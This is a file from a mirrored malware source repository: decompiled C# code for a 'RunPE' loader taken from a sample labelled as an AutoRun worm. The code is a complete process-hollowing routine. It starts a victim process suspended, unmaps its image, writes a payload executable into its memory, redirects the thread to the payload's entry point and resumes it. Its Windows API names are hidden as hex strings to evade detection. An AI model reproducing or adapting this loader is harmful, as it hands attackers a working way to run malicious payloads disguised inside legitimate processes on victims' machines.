mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 21:35:27 +00:00
f2ac1ece55
add
408 lines
16 KiB
C#
408 lines
16 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: BCV5StuB.RunPE
|
|
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
|
|
|
|
using Microsoft.VisualBasic;
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.Runtime.InteropServices;
|
|
|
|
namespace BCV5StuB
|
|
{
|
|
public sealed class RunPE : NativeDllCalls
|
|
{
|
|
private const int CONTEXT_X86 = 65536;
|
|
private const int CONTEXT86_INTEGER = 65538;
|
|
private const long MEM_COMMIT = 4096;
|
|
private const long MEM_RESERVE = 8192;
|
|
private const long PAGE_EXECUTE_READWRITE = 64;
|
|
private const long PAGE_EXECUTE_READ = 32;
|
|
private const long PAGE_EXECUTE = 16;
|
|
private const long PAGE_NOACCESS = 1;
|
|
private const long PAGE_READWRITE = 4;
|
|
private const uint PAGE_READONLY = 2;
|
|
private const string KERNEL32HEX = "0x6b65726e656c3332";
|
|
private const string NTDLLHEX = "0x6e74646c6c";
|
|
|
|
[DebuggerNonUserCode]
|
|
public RunPE()
|
|
{
|
|
}
|
|
|
|
private long Protect(long characteristics) => Conversions.ToLong(new object[8]
|
|
{
|
|
(object) 1L,
|
|
(object) 16L,
|
|
(object) 2U,
|
|
(object) 32L,
|
|
(object) 4L,
|
|
(object) 64L,
|
|
(object) 4L,
|
|
(object) 64L
|
|
}[checked ((int) this.RShift(characteristics, 29L))]);
|
|
|
|
private long RShift(long lValue, long lNumberOfBitsToShift) => checked ((long) Math.Round(unchecked (this.vbLongToULong(lValue) / Math.Pow(2.0, (double) lNumberOfBitsToShift))));
|
|
|
|
private double vbLongToULong(long Value) => Value < 0L ? (double) Value + 4294967296.0 : (double) Value;
|
|
|
|
public bool SRexec(string sExePath, string sVictim)
|
|
{
|
|
bool flag;
|
|
return File.Exists(sExePath) ? this.SRexec(File.ReadAllBytes(sExePath), sVictim) : flag;
|
|
}
|
|
|
|
public bool SRexec(byte[] b, string sVictim)
|
|
{
|
|
RunPE.IMAGE_DOS_HEADER imageDosHeader1 = new RunPE.IMAGE_DOS_HEADER();
|
|
RunPE.CONTEXT lpContext = new RunPE.CONTEXT();
|
|
RunPE.IMAGE_NT_HEADERS imageNtHeaders1 = new RunPE.IMAGE_NT_HEADERS();
|
|
RunPE.IMAGE_SECTION_HEADER imageSectionHeader1 = new RunPE.IMAGE_SECTION_HEADER();
|
|
RunPE.PROCESS_INFORMATION lpProcessInformation = new RunPE.PROCESS_INFORMATION();
|
|
RunPE.STARTUPINFO lpStartupInfo = new RunPE.STARTUPINFO();
|
|
RunPE.SECURITY_ATTRIBUTES lpProcessAttributes = new RunPE.SECURITY_ATTRIBUTES();
|
|
RunPE.SECURITY_ATTRIBUTES lpThreadAttributes = new RunPE.SECURITY_ATTRIBUTES();
|
|
GCHandle gcHandle = GCHandle.Alloc((object) b, GCHandleType.Pinned);
|
|
IntPtr ptr = gcHandle.AddrOfPinnedObject();
|
|
int int32 = ptr.ToInt32();
|
|
object structure1 = Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), imageDosHeader1.GetType());
|
|
RunPE.IMAGE_DOS_HEADER imageDosHeader2;
|
|
RunPE.IMAGE_DOS_HEADER imageDosHeader3 = structure1 != null ? (RunPE.IMAGE_DOS_HEADER) structure1 : imageDosHeader2;
|
|
gcHandle.Free();
|
|
IntPtr lpEnvironment;
|
|
if (!((RunPE.CreateProcessA) this.DynamicCall("0x6b65726e656c3332", "0x43726561746550726f6365737341", typeof (RunPE.CreateProcessA)))((string) null, sVictim, ref lpProcessAttributes, ref lpThreadAttributes, false, 4U, lpEnvironment, (string) null, ref lpStartupInfo, out lpProcessInformation))
|
|
return false;
|
|
ptr = new IntPtr(checked (int32 + imageDosHeader3.e_lfanew));
|
|
object structure2 = Marshal.PtrToStructure(ptr, imageNtHeaders1.GetType());
|
|
RunPE.IMAGE_NT_HEADERS imageNtHeaders2;
|
|
RunPE.IMAGE_NT_HEADERS imageNtHeaders3 = structure2 != null ? (RunPE.IMAGE_NT_HEADERS) structure2 : imageNtHeaders2;
|
|
lpStartupInfo.cb = Strings.Len((object) lpStartupInfo);
|
|
lpContext.ContextFlags = 65538U;
|
|
if (imageNtHeaders3.Signature != 17744U | imageDosHeader3.e_magic != (ushort) 23117)
|
|
return false;
|
|
RunPE.GetThreadContext getThreadContext = (RunPE.GetThreadContext) this.DynamicCall("0x6b65726e656c3332", "0x476574546872656164436f6e74657874", typeof (RunPE.GetThreadContext));
|
|
RunPE.ReadProcessMemory readProcessMemory1 = (RunPE.ReadProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x5265616450726f636573734d656d6f7279", typeof (RunPE.ReadProcessMemory));
|
|
RunPE.ZwUnmapViewOfSection unmapViewOfSection = (RunPE.ZwUnmapViewOfSection) this.DynamicCall("0x6e74646c6c", "0x5a77556e6d6170566965774f6653656374696f6e", typeof (RunPE.ZwUnmapViewOfSection));
|
|
int num1 = getThreadContext(lpProcessInformation.hThread, ref lpContext) ? 1 : 0;
|
|
RunPE.ReadProcessMemory readProcessMemory2 = readProcessMemory1;
|
|
IntPtr hProcess1 = lpProcessInformation.hProcess;
|
|
int lpBaseAddress1 = checked ((int) ((long) lpContext.Ebx + 8L));
|
|
long num2;
|
|
ptr = (IntPtr) num2;
|
|
ref IntPtr local1 = ref ptr;
|
|
int num3 = 0;
|
|
ref int local2 = ref num3;
|
|
int num4 = readProcessMemory2(hProcess1, lpBaseAddress1, ref local1, 4, ref local2);
|
|
long num5 = (long) ptr;
|
|
int num6 = num4 >= 0 ? 1 : 0;
|
|
if ((num1 & num6 & (unmapViewOfSection(lpProcessInformation.hProcess, (IntPtr) num5) >= 0L ? 1 : 0)) == 0)
|
|
return false;
|
|
uint num7 = checked ((uint) (int) ((RunPE.VirtualAllocEx) this.DynamicCall("0x6b65726e656c3332", "0x5669727475616c416c6c6f634578", typeof (RunPE.VirtualAllocEx)))(lpProcessInformation.hProcess, (IntPtr) (long) imageNtHeaders3.OptionalHeader.ImageBase, imageNtHeaders3.OptionalHeader.SizeOfImage, 12288U, 4U));
|
|
if (num7 == 0U)
|
|
return false;
|
|
RunPE.WriteProcessMemory writeProcessMemory1 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory));
|
|
IntPtr hProcess2 = lpProcessInformation.hProcess;
|
|
IntPtr lpBaseAddress2 = (IntPtr) (long) num7;
|
|
byte[] lpBuffer1 = b;
|
|
int sizeOfHeaders = checked ((int) imageNtHeaders3.OptionalHeader.SizeOfHeaders);
|
|
uint num8;
|
|
int num9 = checked ((int) num8);
|
|
ref int local3 = ref num9;
|
|
int num10 = writeProcessMemory1(hProcess2, lpBaseAddress2, lpBuffer1, sizeOfHeaders, out local3) ? 1 : 0;
|
|
uint num11 = checked ((uint) num9);
|
|
long num12 = (long) checked (imageDosHeader3.e_lfanew + 248);
|
|
int num13 = checked ((int) imageNtHeaders3.FileHeader.NumberOfSections - 1);
|
|
int num14 = 0;
|
|
while (num14 <= num13)
|
|
{
|
|
ptr = new IntPtr(checked ((long) int32 + num12 + (long) (num14 * 40)));
|
|
object structure3 = Marshal.PtrToStructure(ptr, imageSectionHeader1.GetType());
|
|
RunPE.IMAGE_SECTION_HEADER imageSectionHeader2;
|
|
imageSectionHeader1 = structure3 != null ? (RunPE.IMAGE_SECTION_HEADER) structure3 : imageSectionHeader2;
|
|
byte[] numArray = new byte[checked ((int) imageSectionHeader1.SizeOfRawData + 1)];
|
|
int num15 = checked ((int) ((long) imageSectionHeader1.SizeOfRawData - 1L));
|
|
int index = 0;
|
|
while (index <= num15)
|
|
{
|
|
numArray[index] = b[checked ((int) ((long) imageSectionHeader1.PointerToRawData + (long) index))];
|
|
checked { ++index; }
|
|
}
|
|
RunPE.WriteProcessMemory writeProcessMemory2 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory));
|
|
RunPE.VirtualProtectEx virtualProtectEx = (RunPE.VirtualProtectEx) this.DynamicCall("0x6b65726e656c3332", "0x5669727475616c50726f746563744578", typeof (RunPE.VirtualProtectEx));
|
|
RunPE.WriteProcessMemory writeProcessMemory3 = writeProcessMemory2;
|
|
IntPtr hProcess3 = lpProcessInformation.hProcess;
|
|
IntPtr lpBaseAddress3 = (IntPtr) (long) checked (num7 + imageSectionHeader1.VirtualAddress);
|
|
byte[] lpBuffer2 = numArray;
|
|
int sizeOfRawData = checked ((int) imageSectionHeader1.SizeOfRawData);
|
|
num9 = checked ((int) num11);
|
|
ref int local4 = ref num9;
|
|
int num16 = writeProcessMemory3(hProcess3, lpBaseAddress3, lpBuffer2, sizeOfRawData, out local4) ? 1 : 0;
|
|
num11 = checked ((uint) num9);
|
|
int num17 = virtualProtectEx(lpProcessInformation.hProcess, (IntPtr) (long) checked (num7 + imageSectionHeader1.VirtualAddress), (UIntPtr) imageSectionHeader1.Misc.VirtualSize, (UIntPtr) checked ((ulong) this.Protect((long) imageSectionHeader1.Characteristics)), checked ((uint) num5));
|
|
checked { ++num14; }
|
|
}
|
|
byte[] bytes = BitConverter.GetBytes(num7);
|
|
RunPE.WriteProcessMemory writeProcessMemory4 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory));
|
|
IntPtr hProcess4 = lpProcessInformation.hProcess;
|
|
IntPtr lpBaseAddress4 = (IntPtr) checked ((long) lpContext.Ebx + 8L);
|
|
byte[] lpBuffer3 = bytes;
|
|
num9 = checked ((int) num11);
|
|
ref int local5 = ref num9;
|
|
int num18 = writeProcessMemory4(hProcess4, lpBaseAddress4, lpBuffer3, 4, out local5) ? 1 : 0;
|
|
num8 = checked ((uint) num9);
|
|
lpContext.Eax = checked (num7 + imageNtHeaders3.OptionalHeader.AddressOfEntryPoint);
|
|
RunPE.SetThreadContext setThreadContext = (RunPE.SetThreadContext) this.DynamicCall("0x6b65726e656c3332", "0x536574546872656164436f6e74657874", typeof (RunPE.SetThreadContext));
|
|
RunPE.ResumeThread resumeThread = (RunPE.ResumeThread) this.DynamicCall("0x6b65726e656c3332", "0x526573756d65546872656164", typeof (RunPE.ResumeThread));
|
|
bool flag;
|
|
return setThreadContext(lpProcessInformation.hThread, ref lpContext) ? resumeThread(lpProcessInformation.hThread) > 0U : flag;
|
|
}
|
|
|
|
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
|
|
private struct STARTUPINFO
|
|
{
|
|
public int cb;
|
|
public string lpReserved;
|
|
public string lpDesktop;
|
|
public string lpTitle;
|
|
public int dwX;
|
|
public int dwY;
|
|
public int dwXSize;
|
|
public int dwYSize;
|
|
public int dwXCountChars;
|
|
public int dwYCountChars;
|
|
public int dwFillAttribute;
|
|
public int dwFlags;
|
|
public short wShowWindow;
|
|
public short cbReserved2;
|
|
public int lpReserved2;
|
|
public int hStdInput;
|
|
public int hStdOutput;
|
|
public int hStdError;
|
|
}
|
|
|
|
private struct PROCESS_INFORMATION
|
|
{
|
|
public IntPtr hProcess;
|
|
public IntPtr hThread;
|
|
public int dwProcessId;
|
|
public int dwThreadId;
|
|
}
|
|
|
|
private struct IMAGE_DOS_HEADER
|
|
{
|
|
public ushort e_magic;
|
|
public ushort e_cblp;
|
|
public ushort e_cp;
|
|
public ushort e_crlc;
|
|
public ushort e_cparhdr;
|
|
public ushort e_minalloc;
|
|
public ushort e_maxalloc;
|
|
public ushort e_ss;
|
|
public ushort e_sp;
|
|
public ushort e_csum;
|
|
public ushort e_ip;
|
|
public ushort e_cs;
|
|
public ushort e_lfarlc;
|
|
public ushort e_ovno;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
|
public ushort[] e_res1;
|
|
public ushort e_oemid;
|
|
public ushort e_oeminfo;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
|
public ushort[] e_res2;
|
|
public int e_lfanew;
|
|
}
|
|
|
|
private struct SECURITY_ATTRIBUTES
|
|
{
|
|
public int nLength;
|
|
public IntPtr lpSecurityDescriptor;
|
|
public int bInheritHandle;
|
|
}
|
|
|
|
private struct FLOATING_SAVE_AREA
|
|
{
|
|
public uint ControlWord;
|
|
public uint StatusWord;
|
|
public uint TagWord;
|
|
public uint ErrorOffset;
|
|
public uint ErrorSelector;
|
|
public uint DataOffset;
|
|
public uint DataSelector;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
|
|
public byte[] RegisterArea;
|
|
public uint Cr0NpxState;
|
|
}
|
|
|
|
private struct CONTEXT
|
|
{
|
|
public uint ContextFlags;
|
|
public uint Dr0;
|
|
public uint Dr1;
|
|
public uint Dr2;
|
|
public uint Dr3;
|
|
public uint Dr6;
|
|
public uint Dr7;
|
|
public RunPE.FLOATING_SAVE_AREA FloatSave;
|
|
public uint SegGs;
|
|
public uint SegFs;
|
|
public uint SegEs;
|
|
public uint SegDs;
|
|
public uint Edi;
|
|
public uint Esi;
|
|
public uint Ebx;
|
|
public uint Edx;
|
|
public uint Ecx;
|
|
public uint Eax;
|
|
public uint Ebp;
|
|
public uint Eip;
|
|
public uint SegCs;
|
|
public uint EFlags;
|
|
public uint Esp;
|
|
public uint SegSs;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
|
|
public byte[] ExtendedRegisters;
|
|
}
|
|
|
|
private struct IMAGE_OPTIONAL_HEADER32
|
|
{
|
|
public ushort Magic;
|
|
public byte MajorLinkerVersion;
|
|
public byte MinorLinkerVersion;
|
|
public uint SizeOfCode;
|
|
public uint SizeOfInitializedData;
|
|
public uint SizeOfUninitializedData;
|
|
public uint AddressOfEntryPoint;
|
|
public uint BaseOfCode;
|
|
public uint BaseOfData;
|
|
public uint ImageBase;
|
|
public uint SectionAlignment;
|
|
public uint FileAlignment;
|
|
public ushort MajorOperatingSystemVersion;
|
|
public ushort MinorOperatingSystemVersion;
|
|
public ushort MajorImageVersion;
|
|
public ushort MinorImageVersion;
|
|
public ushort MajorSubsystemVersion;
|
|
public ushort MinorSubsystemVersion;
|
|
public uint Win32VersionValue;
|
|
public uint SizeOfImage;
|
|
public uint SizeOfHeaders;
|
|
public uint CheckSum;
|
|
public ushort Subsystem;
|
|
public ushort DllCharacteristics;
|
|
public uint SizeOfStackReserve;
|
|
public uint SizeOfStackCommit;
|
|
public uint SizeOfHeapReserve;
|
|
public uint SizeOfHeapCommit;
|
|
public uint LoaderFlags;
|
|
public uint NumberOfRvaAndSizes;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
|
public RunPE.IMAGE_DATA_DIRECTORY[] DataDirectory;
|
|
}
|
|
|
|
private struct IMAGE_FILE_HEADER
|
|
{
|
|
public ushort Machine;
|
|
public ushort NumberOfSections;
|
|
public uint TimeDateStamp;
|
|
public uint PointerToSymbolTable;
|
|
public uint NumberOfSymbols;
|
|
public ushort SizeOfOptionalHeader;
|
|
public ushort Characteristics;
|
|
}
|
|
|
|
private struct IMAGE_DATA_DIRECTORY
|
|
{
|
|
public uint VirtualAddress;
|
|
public uint Size;
|
|
}
|
|
|
|
private struct IMAGE_NT_HEADERS
|
|
{
|
|
public uint Signature;
|
|
public RunPE.IMAGE_FILE_HEADER FileHeader;
|
|
public RunPE.IMAGE_OPTIONAL_HEADER32 OptionalHeader;
|
|
}
|
|
|
|
private struct Misc
|
|
{
|
|
public uint PhysicalAddress;
|
|
public uint VirtualSize;
|
|
}
|
|
|
|
private struct IMAGE_SECTION_HEADER
|
|
{
|
|
public byte Name;
|
|
public RunPE.Misc Misc;
|
|
public uint VirtualAddress;
|
|
public uint SizeOfRawData;
|
|
public uint PointerToRawData;
|
|
public uint PointerToRelocations;
|
|
public uint PointerToLinenumbers;
|
|
public ushort NumberOfRelocations;
|
|
public ushort NumberOfLinenumbers;
|
|
public uint Characteristics;
|
|
}
|
|
|
|
private enum ImageSignatureTypes
|
|
{
|
|
IMAGE_OS2_SIGNATURE_LE = 17740, // 0x0000454C
|
|
IMAGE_VXD_SIGNATURE = 17740, // 0x0000454C
|
|
IMAGE_OS2_SIGNATURE = 17742, // 0x0000454E
|
|
IMAGE_NT_SIGNATURE = 17744, // 0x00004550
|
|
IMAGE_DOS_SIGNATURE = 23117, // 0x00005A4D
|
|
}
|
|
|
|
private delegate uint ResumeThread(IntPtr hThread);
|
|
|
|
private delegate bool GetThreadContext(IntPtr hThread, ref RunPE.CONTEXT lpContext);
|
|
|
|
private delegate bool SetThreadContext(IntPtr hThread, ref RunPE.CONTEXT lpContext);
|
|
|
|
private delegate bool CreateProcessA(
|
|
string lpApplicationName,
|
|
string lpCommandLine,
|
|
ref RunPE.SECURITY_ATTRIBUTES lpProcessAttributes,
|
|
ref RunPE.SECURITY_ATTRIBUTES lpThreadAttributes,
|
|
bool bInheritHandles,
|
|
uint dwCreationFlags,
|
|
IntPtr lpEnvironment,
|
|
string lpCurrentDirectory,
|
|
[In] ref RunPE.STARTUPINFO lpStartupInfo,
|
|
out RunPE.PROCESS_INFORMATION lpProcessInformation);
|
|
|
|
private delegate bool WriteProcessMemory(
|
|
IntPtr hProcess,
|
|
IntPtr lpBaseAddress,
|
|
byte[] lpBuffer,
|
|
int iSize,
|
|
out int lpNumberOfBytesWritten);
|
|
|
|
private delegate int ReadProcessMemory(
|
|
IntPtr hProcess,
|
|
int lpBaseAddress,
|
|
ref IntPtr lpbuffer,
|
|
int size,
|
|
ref int lpNumberOfBytesRead);
|
|
|
|
private delegate long ZwUnmapViewOfSection(IntPtr hProcess, IntPtr BaseAddress);
|
|
|
|
private delegate IntPtr VirtualAllocEx(
|
|
IntPtr hProcess,
|
|
IntPtr lpAddress,
|
|
uint dwSize,
|
|
uint flAllocationType,
|
|
uint flProtect);
|
|
|
|
private delegate int VirtualProtectEx(
|
|
IntPtr hProcess,
|
|
IntPtr lpAddress,
|
|
UIntPtr dwSize,
|
|
UIntPtr flNewProtect,
|
|
[Out] uint lpflOldProtect);
|
|
}
|
|
}
|